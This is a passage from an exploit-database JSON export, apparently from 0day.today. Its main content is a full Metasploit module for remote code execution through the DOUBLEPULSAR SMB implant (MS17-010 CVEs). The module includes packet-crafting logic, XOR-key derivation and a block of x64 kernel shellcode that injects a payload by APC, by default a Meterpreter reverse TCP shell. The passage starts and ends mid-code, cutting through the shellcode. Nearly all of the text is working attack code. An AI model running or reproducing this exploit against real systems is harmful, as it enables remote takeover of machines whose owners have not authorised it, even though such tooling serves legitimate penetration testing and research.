pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T02:14:49", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e749f81c1854806cb4d4c9c3c463dc50", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-06T00:18:57", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T00:18:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T00:18:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n 